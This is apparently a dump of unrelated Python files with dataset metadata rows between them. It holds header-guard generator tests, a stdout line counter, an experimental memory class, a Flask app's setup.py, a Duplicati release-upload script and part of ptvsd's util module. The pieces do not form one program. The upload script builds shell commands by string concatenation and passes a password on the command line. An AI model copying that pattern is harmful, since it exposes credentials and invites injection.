def test_path_negative_arg():
pattern = 'path -1'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = os.path.join('src','widgets','Match.h')
assert_equals(createGuard(ctx), 'widgets_Match_h')
def test_path_negative_big_arg():
pattern = 'path -2'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = 'Match.h'
assert_equals(createGuard(ctx), 'Match_h')
@unix_only
def test_path_absolute_path():
pattern = 'path -1'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = '/dev/null'
assert_equals(createGuard(ctx), 'null')
@windows_only
def test_path_absolute_path_windows():
pattern = 'path -1'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = 'C:\Program Files (x86)\Match.h'
assert_equals(createGuard(ctx), 'Match_h')
@raises(ParserError)
def test_path_bad_arg():
pattern = 'path lkj'
createGuard = compile_pattern(pattern)
def test_parents_arg():
pattern = 'path | parents 1'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = os.path.join('src','widgets','Match.h')
assert_equals(createGuard(ctx), 'widgets_Match_h')
@raises(ParserError)
def test_parents_missing_arg():
pattern = 'path parents'
createGuard = compile_pattern(pattern)
def test_parents_big_arg():
pattern = 'path | parents 10'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = os.path.join('src','widgets','Match.h')
assert_equals(createGuard(ctx), 'src_widgets_Match_h')
def test_parents_zero_arg():
pattern = 'path | parents 0'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = os.path.join('src','widgets','Match.h')
assert_equals(createGuard(ctx), 'Match_h')
def test_parents_negative_arg():
pattern = 'path | parents -1'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = os.path.join('src','widgets','Match.h')
assert_equals(createGuard(ctx), 'widgets_Match_h')
def test_parents_negative_big_arg():
pattern = 'path | parents -2'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = 'Match.h'
assert_equals(createGuard(ctx), 'Match_h')
@raises(ParserError)
def test_parents_bad_arg():
pattern = 'path | parents lkj'
createGuard = compile_pattern(pattern)
@unix_only
def test_parents_absolute_path():
pattern = 'path | parents -1'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = '/dev/null'
assert_equals(createGuard(ctx), 'null')
@windows_only
def test_parents_absolute_path_windows():
pattern = 'path | parents -1'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = 'C:\Program Files (x86)\Match.h'
assert_equals(createGuard(ctx), 'Match_h')
def test_upper():
pattern = 'name | upper'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'Match.h'
assert_equals(createGuard(ctx), 'MATCH_H')
def test_lower():
pattern = 'name | lower'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'Match.h'
assert_equals(createGuard(ctx), 'match_h')
def test_snake():
pattern = 'name | snake'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'MatchFactory.h'
assert_equals(createGuard(ctx), 'match_factory_h')
def test_snake_acronym():
pattern = 'name | snake'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'MatchHTTPFactory.h'
assert_equals(createGuard(ctx), 'match_http_factory_h')
def test_snake_single_letter_word():
pattern = 'name | snake'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'BreakAStick.h'
assert_equals(createGuard(ctx), 'break_a_stick_h')
def test_snake_path():
pattern = 'path 1 | snake'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = os.path.join('Code','CaptureContext.h')
assert_equals(createGuard(ctx), 'code_capture_context_h')
def test_snake_symbols():
pattern = 'name | snake | raw'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'Micro$oftWord.h'
assert_equals(createGuard(ctx), 'micro$oft_word.h')
def test_pascal():
pattern = 'name | pascal'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'match_factory.h'
assert_equals(createGuard(ctx), 'MatchFactory_h')
def test_prepend():
pattern = 'name | prepend __'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'Match.h'
assert_equals(createGuard(ctx), '__Match_h')
def test_append():
pattern = 'name | append __'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'Match.h'
assert_equals(createGuard(ctx), 'Match_h__')
def test_surround():
pattern = 'name | surround __'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'Match.h'
assert_equals(createGuard(ctx), '__Match_h__')
def test_remove():
pattern = 'name | remove atch'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'Match.h'
assert_equals(createGuard(ctx), 'M_h')
def test_replace():
pattern = 'name | replace M W'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'Match.h'
assert_equals(createGuard(ctx), 'Watch_h')
def test_replace_multiple_characters():
pattern = 'name | replace bunny teapot'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'bunny.h'
assert_equals(createGuard(ctx), 'teapot_h')
def test_replace_with_whitespace():
pattern = "name | replace a ' ' | raw"
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'Match.h'
assert_equals(createGuard(ctx), 'M tch.h')
def test_replace_with_empty_string():
pattern = "name | replace a '' | raw"
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'Match.h'
assert_equals(createGuard(ctx), 'Mtch.h')
@raises(ParserError)
def test_replace_with_unclosed_single_quote():
pattern = "name | replace a ' "
createGuard = compile_pattern(pattern)
@raises(ParserError)
def test_replace_with_unclosed_double_quote():
pattern = 'name | replace a " '
createGuard = compile_pattern(pattern)
def test_raw():
pattern = 'name | raw'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'Match.h'
assert_equals(createGuard(ctx), 'Match.h')
@raises(ParserError)
def test_raw_not_last():
pattern = 'name | raw | upper'
createGuard = compile_pattern(pattern)
@raises(ParserError)
def test_empty_pattern():
pattern = ''
createGuard = compile_pattern(pattern)
@raises(ParserError)
def test_does_not_start_with_source():
pattern = 'upper'
createGuard = compile_pattern(pattern)
@raises(ParserError)
def test_replace_insufficient_args():
pattern = 'name | replace M'
createGuard = compile_pattern(pattern)
@raises(ParserError)
def test_replace_insufficient_args_into_pipe():
pattern = 'name | replace M | upper'
createGuard = compile_pattern(pattern)
@raises(ParserError)
def test_replace_too_many_args():
pattern = 'name | replace M J K'
createGuard = compile_pattern(pattern)
@raises(ParserError)
def test_replace_too_many_args_into_pipe():
pattern = 'name | replace M J K | upper'
createGuard = compile_pattern(pattern)
@raises(ParserError)
def test_bad_arg():
pattern = 'name upper'
createGuard = compile_pattern(pattern)
def test_arg_single_quote():
pattern = "name | replace '|' W"
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = '|.h'
assert_equals(createGuard(ctx), 'W_h')
def test_arg_double_quote():
pattern = 'name | replace "|" W'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = '|.h'
assert_equals(createGuard(ctx), 'W_h')
@raises(ParserError)
def test_missing_filter():
pattern = 'name |'
createGuard = compile_pattern(pattern)
| mit | -5,455,985,354,004,510,000 | 27.682997 | 61 | 0.658294 | false | 3.357962 | true | false | false |
kepoorhampond/python-draftlog | draftlog/lcs.py | 1 | 1104 | """
LCS: Line Count Stream
"""
from draftlog.logdraft import LogDraft
from draftlog.drafter import Drafter
import os
import subprocess
import sys
"""
An object inserted into "sys.stdout" in order to
keep track of how many lines have been logged.
"""
class LineCountStream(object):
def __init__(self):
self.data = ""
self.stdout = sys.stdout
self.lines = 1
self.logs = 0
self.editing = False
# Reads the command "tput lines" if valid
try:
self.rows = subprocess.Popen("tput lines").read()
except (ValueError, IOError, OSError):
self.rows = 20
"""
The function that overwrites "sys.stdout.write", and
counts the number of lines in what is being "printed".
"""
def write(self, data):
if not self.editing:
self.count_lines(data)
self.stdout.write(data)
def flush(self):
self.stdout.flush()
# Counts lines
def count_lines(self, data):
datalines = len(str(data).split("\n")) - 1
self.lines += datalines
self.data += data
| mit | -5,066,193,894,276,154,000 | 24.090909 | 61 | 0.605978 | false | 3.873684 | false | false | false |
mobarski/sandbox | rsm/v1.py | 2 | 3677 | from common import *
# TODO rename -> pooling/random/sparse/distributed hebbian/horde/crowd/fragment/sample memory
# NEW NAME: random sample memory / fruit fly memory
# TODO vol/mem_cnt_score_boost
# TODO focus
# TODO focus boost
# TODO noise boost
# TODO auto noise
# TODO auto focus
class rsm:
def __init__(self, n, m):
"""
n -- number of neurons
m -- max number of synapses
"""
self.mem = {j:set() for j in range(n)} # memory
self.vol = {j:set() for j in range(n)} # volatile memory -- "Once is never. Twice is always."
self.free = {j:m for j in range(n)}
self.mem_cnt = {}
self.vol_cnt = {}
self.ofreq = {j:0 for j in range(n)} # output frequency
self.noise = set() # ignored inputs
self.focus = set() # valuable inputs
self.cfg = dict(n=n,m=m)
self.cnt = 0
def save(self, f):
v=2
pos0 = f.tell()
marshal.dump(self.cfg,f,v)
marshal.dump(self.mem,f,v)
marshal.dump(self.vol,f,v)
marshal.dump(self.mem_cnt,f,v)
marshal.dump(self.vol_cnt,f,v)
marshal.dump(self.free,f,v)
marshal.dump(self.ofreq,f,v)
marshal.dump(self.noise,f,v)
marshal.dump(self.focus,f,v)
marshal.dump(self.cnt,f,v)
return f.tell()-pos0
def score(self, input, boost=False):
""
inp = set(input) - self.noise
mem = self.mem
free = self.free
free_score_boost = 0.9
if boost:
score = {j:free_score_boost*free[j]+len(inp & mem[j]) for j in mem}
else:
score = {j:len(inp & mem[j]) for j in mem}
return score
def learn(self, input, k):
mem = self.mem
vol = self.vol
mem_cnt = self.mem_cnt
vol_cnt = self.vol_cnt
free = self.free
ofreq = self.ofreq
self.cnt += 1
inp = set(input) - self.noise
score = self.score(input, boost=True)
winners = top(k,score)
for j in winners:
ofreq[j] += 1 # update output frequency
# known inputs
known = inp & mem[j]
confirmed = inp & vol[j] # confirmed: seen for the second time
vol[j].difference_update(confirmed)
for i in confirmed:
vol_cnt[i] -= 1
# unknown inputs
unknown = inp - mem[j]
u_by_f = list(unknown) # TODO
if free[j]:
# TODO .focus
new = u_by_f[:free[j]]
if new:
mem[j].update(new)
vol[j].update(new)
free[j] -= len(new)
for i in new:
mem_cnt[i] = mem_cnt.get(i,0)+1
vol_cnt[i] = vol_cnt.get(i,0)+1
elif unknown:
# TODO how many ???
if vol[j]:
# TODO random pick using mem_cnt and vol_cnt
# TODO .focus
i = vol[j].pop()
mem[j].remove(i)
mem_cnt[i] -= 1
vol_cnt[i] -= 1
elif confirmed:
# TODO random pick using mem_cnt and vol_cnt
# TODO .focus
i = confirmed.pop()
mem[j].remove(i)
mem_cnt[i] -= 1
else:
# TODO random pick using mem_cnt and vol_cnt
# TODO .focus
i = mem[j].pop()
mem_cnt[i] -= 1
i = u_by_f[0] # TODO .focus
mem[j].add(i)
vol[j].add(i)
mem_cnt[i] = mem_cnt.get(i,0)+1
vol_cnt[i] = vol_cnt.get(i,0)+1
return score
# not used
def forget(self,value):
"remove value from memory"
mem = self.mem
free = self.free
for j in mem:
if value in mem[j]:
mem[j].remove(value)
free[j] += 1
if __name__=="__main__":
t0=time()
mm = rsm(100,5)
clock('init',t0)
X = [random_vector(0,9,30) for _ in range(10)]
x = X[0]
t0 = time()
s = mm.score(x)
clock('score',t0)
print(sum(top(3,s,values=True)))
t0 = time()
for _ in range(10):
for x in X:
mm.learn(x,10)
clock('learn',t0)
for x in X:
s = mm.score(x)
print(sum(top(3,s,values=True)))
t0=time()
size=mm.save(open('data/v1.model','wb'))
clock('save',t0)
print('size:',size//1024,'KB')
#
print(X[0])
print(mm.mem)
print(mm.free)
print(mm.vol) | mit | 494,271,387,442,654,200 | 22.278481 | 95 | 0.595866 | false | 2.457888 | false | false | false |
ananthb/binder | setup.py | 1 | 1341 | """
binder
~~~~~~
binder is a learning social network. It helps you find and learn with
other students. Give it a whirl. Sign up today!
binder is also open source software and available under the MIT license.
:copyright: (c) 2015 by Ananth Bhaskararaman
:license: MIT, see LICENSE for more details
"""
import sys
if sys.version < '3.2.0':
raise RuntimeError("You need at least python 3.4 for binder to work.")
from setuptools import setup
install_requires = [
'Flask==0.10.1',
'Flask-Bootstrap==3.3.5.6',
'Flask-Menu==0.4.0',
'Flask-Script==2.0.5',
'Flask-SQLAlchemy==2.0',
'SQLAlchemy==1.0.8',
'Flask-Login==0.2.11',
'rq==0.5.5',
'Flask-Dance==0.7.0',
'blinker==1.4',
'flask-log==0.1.0'
]
if '3.2.0' < sys.version < '3.4.0':
install_requires.append('enum34==1.0.4')
setup(
name='binder',
version='0.0.4',
description='Brings students closer.',
license='MIT',
long_description=__doc__,
packages=['binder', 'binder.pages'],
author='Ananth Bhaskararaman',
author_email='[email protected]',
url='http://github.com/ananthb/binder',
platforms='any',
install_requires=install_requires,
entry_points={
'console_scripts': [
'binder = binder:binder_app'
],
},
zip_safe=True,
)
| mit | -1,047,073,338,729,103,500 | 22.526316 | 76 | 0.607755 | false | 2.98 | false | false | false |
Xervmon/XervSync | duplicati/Installer/upload.py | 1 | 5342 | #!/usr/bin/env python
import sys
import os
import glob
def main():
source_folder = os.path.join('bin', 'release')
new_version = None
suggest_string = ''
for testfile in glob.glob( os.path.join(source_folder, 'Duplicati *.zip') ):
version_info = testfile[testfile.rfind('Duplicati ') + len('Duplicati '):- len('.zip')]
if new_version is None:
new_version = version_info
suggest_string = '[' + new_version + ']'
else:
sys.stdout.write('More than one file matching, no auto suggests for you!\n')
suggest_string = ''
new_version = None
break
sys.stdout.write('Please enter file version number ' + suggest_string + ': ')
file_version = sys.stdin.readline().rstrip()
if (file_version is None or len(file_version) == 0):
file_version = new_version
if (file_version is None or len(file_version) == 0):
sys.stdout.write('No name given, exiting\n')
sys.exit(-1)
summary_base = "Duplicati " + file_version
filename_base = "Duplicati " + file_version
sys.stdout.write('Please enter description [' + summary_base + ']: ')
tmp = file_version = sys.stdin.readline().rstrip()
if (len(tmp) != 0):
sumary_base = tmp
filename_zip = filename_base + ".zip"
filename_msi_x86 = filename_base + ".msi"
filename_msi_x64 = filename_base + ".x64.msi"
filename_deb = filename_base + ".deb"
filename_dmg = filename_base + ".dmg"
filename_rpm = filename_base + ".noarch.rpm"
filename_tgz = filename_base + ".tgz"
filename_zip = os.path.join(source_folder, filename_zip)
filename_msi_x86 = os.path.join(source_folder, filename_msi_x86)
filename_msi_x64 = os.path.join(source_folder, filename_msi_x64)
filename_deb = os.path.join(source_folder, filename_deb)
filename_dmg = os.path.join(source_folder, filename_dmg)
filename_rpm = os.path.join(source_folder, filename_rpm)
filename_tgz = os.path.join(source_folder, filename_tgz)
username = None
password = None
upload_count = 0
try:
with open('account_info', 'r') as f:
username = f.readline().strip()
password = f.readline().strip()
except IOError as e:
None
if (username is None or len(username) == 0 or password is None or len(password) == 0):
sys.stdout.write("username or password was empty\n")
sys.stdout.write("please make a file called account_info with the\n")
sys.stdout.write("username on the first line and the\n")
sys.stdout.write("google code password on the second line\n")
return -1
if (os.path.exists(filename_zip)):
sys.stdout.write('Uploading file: ' + filename_zip + '\n')
os.system('python googlecode_upload.py --summary="' + summary_base + ' - Binaries" --project="duplicati" --labels="Type-Archive,OpSys-All" "' + filename_zip + '" --user="' + username + '" --password="' + password + '"')
upload_count+=1
if (os.path.exists(filename_msi_x86)):
sys.stdout.write('Uploading file: ' + filename_msi_x86 + '\n')
os.system('python googlecode_upload.py --summary="' + summary_base + ' - Windows" --project="duplicati" --labels="Type-Installer,OpSys-Windows" "' + filename_msi_x86 + '" --user="' + username + '" --password="' + password + '"')
upload_count+=1
if (os.path.exists(filename_msi_x64)):
sys.stdout.write('Uploading file: ' + filename_msi_x64 + '\n')
os.system('python googlecode_upload.py --summary="' + summary_base + ' - Windows 64bit" --project="duplicati" --labels="Type-Installer,OpSys-Windows" "' + filename_msi_x64 + '" --user="' + username + '" --password="' + password + '"')
upload_count+=1
if (os.path.exists(filename_deb)):
sys.stdout.write('Uploading file: ' + filename_deb + '\n')
os.system('python googlecode_upload.py --summary="' + summary_base + ' - Debian package" --project="duplicati" --labels="Type-Installer,OpSys-Linux" "' + filename_deb + '" --user="' + username + '" --password="' + password + '"')
upload_count+=1
if (os.path.exists(filename_rpm)):
sys.stdout.write('Uploading file: ' + filename_rpm + '\n')
os.system('python googlecode_upload.py --summary="' + summary_base + ' - Fedora package" --project="duplicati" --labels="Type-Installer,OpSys-Linux" "' + filename_rpm + '" --user="' + username + '" --password="' + password + '"')
upload_count+=1
if (os.path.exists(filename_dmg)):
sys.stdout.write('Uploading file: ' + filename_dmg + '\n')
os.system('python googlecode_upload.py --summary="' + summary_base + ' - Mac OSX image" --project="duplicati" --labels="Type-Installer,OpSys-OSX" "' + filename_dmg + '" --user="' + username + '" --password="' + password + '"')
upload_count+=1
if (os.path.exists(filename_tgz)):
sys.stdout.write('Uploading file: ' + filename_tgz + '\n')
os.system('python googlecode_upload.py --summary="' + summary_base + ' - Linux tgz package" --project="duplicati" --labels="Type-Installer,OpSys-Linux" "' + filename_tgz + '" --user="' + username + '" --password="' + password + '"')
upload_count+=1
if (upload_count == 0):
sys.stdout.write('No files uploaded, wrong filename?')
else:
sys.stdout.write('All uploaded !')
if __name__ == '__main__':
sys.exit(main())
| gpl-3.0 | 7,946,786,659,490,272,000 | 42.516667 | 238 | 0.624298 | false | 3.334582 | false | false | false |
SlicerRt/SlicerDebuggingTools | PyDevRemoteDebug/ptvsd-3.2.1/ptvsd/util.py | 1 | 22941 | # Python Tools for Visual Studio
# Copyright(c) Microsoft Corporation
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the License); you may not use
# this file except in compliance with the License. You may obtain a copy of the
# License at http://www.apache.org/licenses/LICENSE-2.0
#
# THIS CODE IS PROVIDED ON AN *AS IS* BASIS, WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION ANY
# IMPLIED WARRANTIES OR CONDITIONS OF TITLE, FITNESS FOR A PARTICULAR PURPOSE,
# MERCHANTABLITY OR NON-INFRINGEMENT.
#
# See the Apache Version 2.0 License for specific language governing
# permissions and limitations under the License.
__author__ = "Microsoft Corporation <[email protected]>"
__version__ = "3.2.1.0"
# This module MUST NOT import threading in global scope. This is because in a direct (non-ptvsd)
# attach scenario, it is loaded on the injected debugger attach thread, and if threading module
# hasn't been loaded already, it will assume that the thread on which it is being loaded is the
# main thread. This will cause issues when the thread goes away after attach completes.
import imp
import os
import sys
import struct
# Import encodings early to avoid import on the debugger thread, which may cause deadlock
from encodings import utf_8, ascii
# WARNING: Avoid imports beyond this point, specifically on the debugger thread, as this may cause
# deadlock where the debugger thread performs an import while a user thread has the import lock
# Py3k compat - alias unicode to str, and xrange to range
try:
unicode
except:
unicode = str
try:
xrange
except:
xrange = range
if sys.version_info[0] >= 3:
def to_bytes(cmd_str):
return ascii.Codec.encode(cmd_str)[0]
else:
def to_bytes(cmd_str):
return cmd_str
def exec_code(code, file, global_variables):
'''Executes the provided code as if it were the original script provided
to python.exe. The functionality is similar to `runpy.run_path`, which was
added in Python 2.7/3.2.
The following values in `global_variables` will be set to the following
values, if they are not already set::
__name__ = '<run_path>'
__file__ = file
__package__ = __name__.rpartition('.')[0] # 2.6 and later
__cached__ = None # 3.2 and later
__loader__ = None # 3.3 and later
The `sys.modules` entry for ``__name__`` will be set to a new module, and
``sys.path[0]`` will be changed to the value of `file` without the filename.
Both values are restored when this function exits.
'''
original_main = sys.modules.get('__main__')
global_variables = dict(global_variables)
mod_name = global_variables.setdefault('__name__', '<run_path>')
mod = sys.modules[mod_name] = imp.new_module(mod_name)
mod.__dict__.update(global_variables)
global_variables = mod.__dict__
global_variables.setdefault('__file__', file)
if sys.version_info[0] >= 3 or sys.version_info[1] >= 6:
global_variables.setdefault('__package__', mod_name.rpartition('.')[0])
if sys.version_info[0] >= 3:
if sys.version_info[1] >= 2:
global_variables.setdefault('__cached__', None)
if sys.version_info[1] >= 3:
try:
global_variables.setdefault('__loader__', original_main.__loader__)
except AttributeError:
pass
if os.path.isdir(sys.path[0]):
sys.path.insert(0, os.path.split(file)[0])
else:
sys.path[0] = os.path.split(file)[0]
code_obj = compile(code, file, 'exec')
exec(code_obj, global_variables)
def exec_file(file, global_variables):
'''Executes the provided script as if it were the original script provided
to python.exe. The functionality is similar to `runpy.run_path`, which was
added in Python 2.7/3.2.
The following values in `global_variables` will be set to the following
values, if they are not already set::
__name__ = '<run_path>'
__file__ = file
__package__ = __name__.rpartition('.')[0] # 2.6 and later
__cached__ = None # 3.2 and later
__loader__ = sys.modules['__main__'].__loader__ # 3.3 and later
The `sys.modules` entry for ``__name__`` will be set to a new module, and
``sys.path[0]`` will be changed to the value of `file` without the filename.
Both values are restored when this function exits.
'''
f = open(file, "rb")
try:
code = f.read().replace(to_bytes('\r\n'), to_bytes('\n')) + to_bytes('\n')
finally:
f.close()
exec_code(code, file, global_variables)
def exec_module(module, global_variables):
'''Executes the provided module as if it were provided as '-m module'. The
functionality is implemented using `runpy.run_module`, which was added in
Python 2.5.
'''
import runpy
runpy.run_module(module, global_variables, run_name=global_variables.get('__name__'), alter_sys=True)
UNICODE_PREFIX = to_bytes('U')
ASCII_PREFIX = to_bytes('A')
NONE_PREFIX = to_bytes('N')
def read_bytes(conn, count):
b = to_bytes('')
while len(b) < count:
received_data = conn.recv(count - len(b))
if received_data is None:
break
b += received_data
return b
def write_bytes(conn, b):
conn.sendall(b)
def read_int(conn):
return struct.unpack('!q', read_bytes(conn, 8))[0]
def write_int(conn, i):
write_bytes(conn, struct.pack('!q', i))
def read_string(conn):
""" reads length of text to read, and then the text encoded in UTF-8, and returns the string"""
strlen = read_int(conn)
if not strlen:
return ''
res = to_bytes('')
while len(res) < strlen:
res = res + conn.recv(strlen - len(res))
res = utf_8.decode(res)[0]
if sys.version_info[0] == 2 and sys.platform != 'cli':
# Py 2.x, we want an ASCII string if possible
try:
res = ascii.Codec.encode(res)[0]
except UnicodeEncodeError:
pass
return res
def write_string(conn, s):
if s is None:
write_bytes(conn, NONE_PREFIX)
elif isinstance(s, unicode):
b = utf_8.encode(s)[0]
b_len = len(b)
write_bytes(conn, UNICODE_PREFIX)
write_int(conn, b_len)
if b_len > 0:
write_bytes(conn, b)
else:
s_len = len(s)
write_bytes(conn, ASCII_PREFIX)
write_int(conn, s_len)
if s_len > 0:
write_bytes(conn, s)
class SafeRepr(object):
# String types are truncated to maxstring_outer when at the outer-
# most level, and truncated to maxstring_inner characters inside
# collections.
maxstring_outer = 2 ** 16
maxstring_inner = 30
if sys.version_info >= (3, 0):
string_types = (str, bytes)
set_info = (set, '{', '}', False)
frozenset_info = (frozenset, 'frozenset({', '})', False)
else:
string_types = (str, unicode)
set_info = (set, 'set([', '])', False)
frozenset_info = (frozenset, 'frozenset([', '])', False)
# Collection types are recursively iterated for each limit in
# maxcollection.
maxcollection = (15, 10)
# Specifies type, prefix string, suffix string, and whether to include a
# comma if there is only one element. (Using a sequence rather than a
# mapping because we use isinstance() to determine the matching type.)
collection_types = [
(tuple, '(', ')', True),
(list, '[', ']', False),
frozenset_info,
set_info,
]
try:
from collections import deque
collection_types.append((deque, 'deque([', '])', False))
except:
pass
# type, prefix string, suffix string, item prefix string, item key/value separator, item suffix string
dict_types = [(dict, '{', '}', '', ': ', '')]
try:
from collections import OrderedDict
dict_types.append((OrderedDict, 'OrderedDict([', '])', '(', ', ', ')'))
except:
pass
# All other types are treated identically to strings, but using
# different limits.
maxother_outer = 2 ** 16
maxother_inner = 30
def __call__(self, obj):
try:
return ''.join(self._repr(obj, 0))
except:
try:
return 'An exception was raised: %r' % sys.exc_info()[1]
except:
return 'An exception was raised'
def _repr(self, obj, level):
'''Returns an iterable of the parts in the final repr string.'''
try:
obj_repr = type(obj).__repr__
except:
obj_repr = None
def has_obj_repr(t):
r = t.__repr__
try:
return obj_repr == r
except:
return obj_repr is r
for t, prefix, suffix, comma in self.collection_types:
if isinstance(obj, t) and has_obj_repr(t):
return self._repr_iter(obj, level, prefix, suffix, comma)
for t, prefix, suffix, item_prefix, item_sep, item_suffix in self.dict_types:
if isinstance(obj, t) and has_obj_repr(t):
return self._repr_dict(obj, level, prefix, suffix, item_prefix, item_sep, item_suffix)
for t in self.string_types:
if isinstance(obj, t) and has_obj_repr(t):
return self._repr_str(obj, level)
if self._is_long_iter(obj):
return self._repr_long_iter(obj)
return self._repr_other(obj, level)
# Determines whether an iterable exceeds the limits set in maxlimits, and is therefore unsafe to repr().
def _is_long_iter(self, obj, level = 0):
try:
# Strings have their own limits (and do not nest). Because they don't have __iter__ in 2.x, this
# check goes before the next one.
if isinstance(obj, self.string_types):
return len(obj) > self.maxstring_inner
# If it's not an iterable (and not a string), it's fine.
if not hasattr(obj, '__iter__'):
return False
# Iterable is its own iterator - this is a one-off iterable like generator or enumerate(). We can't
# really count that, but repr() for these should not include any elements anyway, so we can treat it
# the same as non-iterables.
if obj is iter(obj):
return False
# xrange reprs fine regardless of length.
if isinstance(obj, xrange):
return False
# numpy and scipy collections (ndarray etc) have self-truncating repr, so they're always safe.
try:
module = type(obj).__module__.partition('.')[0]
if module in ('numpy', 'scipy'):
return False
except:
pass
# Iterables that nest too deep are considered long.
if level >= len(self.maxcollection):
return True
# It is too long if the length exceeds the limit, or any of its elements are long iterables.
if hasattr(obj, '__len__'):
try:
l = len(obj)
except:
l = None
if l is not None and l > self.maxcollection[level]:
return True
return any((self._is_long_iter(item, level + 1) for item in obj))
return any(i > self.maxcollection[level] or self._is_long_iter(item, level + 1) for i, item in enumerate(obj))
except:
# If anything breaks, assume the worst case.
return True
def _repr_iter(self, obj, level, prefix, suffix, comma_after_single_element = False):
yield prefix
if level >= len(self.maxcollection):
yield '...'
else:
count = self.maxcollection[level]
yield_comma = False
for item in obj:
if yield_comma:
yield ', '
yield_comma = True
count -= 1
if count <= 0:
yield '...'
break
for p in self._repr(item, 100 if item is obj else level + 1):
yield p
else:
if comma_after_single_element and count == self.maxcollection[level] - 1:
yield ','
yield suffix
def _repr_long_iter(self, obj):
try:
obj_repr = '<%s, len() = %s>' % (type(obj).__name__, len(obj))
except:
try:
obj_repr = '<' + type(obj).__name__ + '>'
except:
obj_repr = '<no repr available for object>'
yield obj_repr
def _repr_dict(self, obj, level, prefix, suffix, item_prefix, item_sep, item_suffix):
if not obj:
yield prefix + suffix
return
if level >= len(self.maxcollection):
yield prefix + '...' + suffix
return
yield prefix
count = self.maxcollection[level]
yield_comma = False
try:
sorted_keys = sorted(obj)
except Exception:
sorted_keys = list(obj)
for key in sorted_keys:
if yield_comma:
yield ', '
yield_comma = True
count -= 1
if count <= 0:
yield '...'
break
yield item_prefix
for p in self._repr(key, level + 1):
yield p
yield item_sep
try:
item = obj[key]
except Exception:
yield '<?>'
else:
for p in self._repr(item, 100 if item is obj else level + 1):
yield p
yield item_suffix
yield suffix
def _repr_str(self, obj, level):
return self._repr_obj(obj, level, self.maxstring_inner, self.maxstring_outer)
def _repr_other(self, obj, level):
return self._repr_obj(obj, level, self.maxother_inner, self.maxother_outer)
def _repr_obj(self, obj, level, limit_inner, limit_outer):
try:
obj_repr = repr(obj)
except:
try:
obj_repr = object.__repr__(obj)
except:
try:
obj_repr = '<no repr available for ' + type(obj).__name__ + '>'
except:
obj_repr = '<no repr available for object>'
limit = limit_inner if level > 0 else limit_outer
if limit >= len(obj_repr):
yield obj_repr
return
# Slightly imprecise calculations - we may end up with a string that is
# up to 3 characters longer than limit. If you need precise formatting,
# you are using the wrong class.
left_count, right_count = max(1, int(2 * limit / 3)), max(1, int(limit / 3))
yield obj_repr[:left_count]
yield '...'
yield obj_repr[-right_count:]
def _selftest(self):
# Test the string limiting somewhat automatically
tests = []
tests.append((7, 9, 'A' * (5)))
tests.append((self.maxstring_outer + 3, self.maxstring_inner + 3 + 2, 'A' * (self.maxstring_outer + 10)))
if sys.version_info >= (3, 0):
tests.append((self.maxstring_outer + 4, self.maxstring_inner + 4 + 2, bytes('A', 'ascii') * (self.maxstring_outer + 10)))
else:
tests.append((self.maxstring_outer + 4, self.maxstring_inner + 4 + 2, unicode('A') * (self.maxstring_outer + 10)))
for limit1, limit2, value in tests:
assert len(self(value)) <= limit1 <= len(repr(value)), (len(self(value)), limit1, len(repr(value)), value)
assert len(self([value])) <= limit2 <= len(repr([value])), (len(self([value])), limit2, len(repr([value])), self([value]))
def test(source, expected):
actual = self(source)
if actual != expected:
print("Source " + repr(source))
print("Expect " + expected)
print("Actual " + actual)
print("")
assert False
def re_test(source, pattern):
import re
actual = self(source)
if not re.match(pattern, actual):
print("Source " + repr(source))
print("Pattern " + pattern)
print("Actual " + actual)
print("")
assert False
for ctype, _prefix, _suffix, comma in self.collection_types:
for i in range(len(self.maxcollection)):
prefix = _prefix * (i + 1)
if comma:
suffix = _suffix + ("," + _suffix) * i
else:
suffix = _suffix * (i + 1)
#print("ctype = " + ctype.__name__ + ", maxcollection[" + str(i) + "] == " + str(self.maxcollection[i]))
c1 = ctype(range(self.maxcollection[i] - 1))
inner_repr = prefix + ', '.join(str(j) for j in c1)
c2 = ctype(range(self.maxcollection[i]))
c3 = ctype(range(self.maxcollection[i] + 1))
for j in range(i):
c1, c2, c3 = ctype((c1,)), ctype((c2,)), ctype((c3,))
test(c1, inner_repr + suffix)
test(c2, inner_repr + ", ..." + suffix)
test(c3, inner_repr + ", ..." + suffix)
if ctype is set:
# Cannot recursively add sets to sets
break
# Assume that all tests apply equally to all iterable types and only
# test with lists.
c1 = list(range(self.maxcollection[0] * 2))
c2 = [c1 for _ in range(self.maxcollection[0] * 2)]
c1_expect = '[' + ', '.join(str(j) for j in range(self.maxcollection[0] - 1)) + ', ...]'
test(c1, c1_expect)
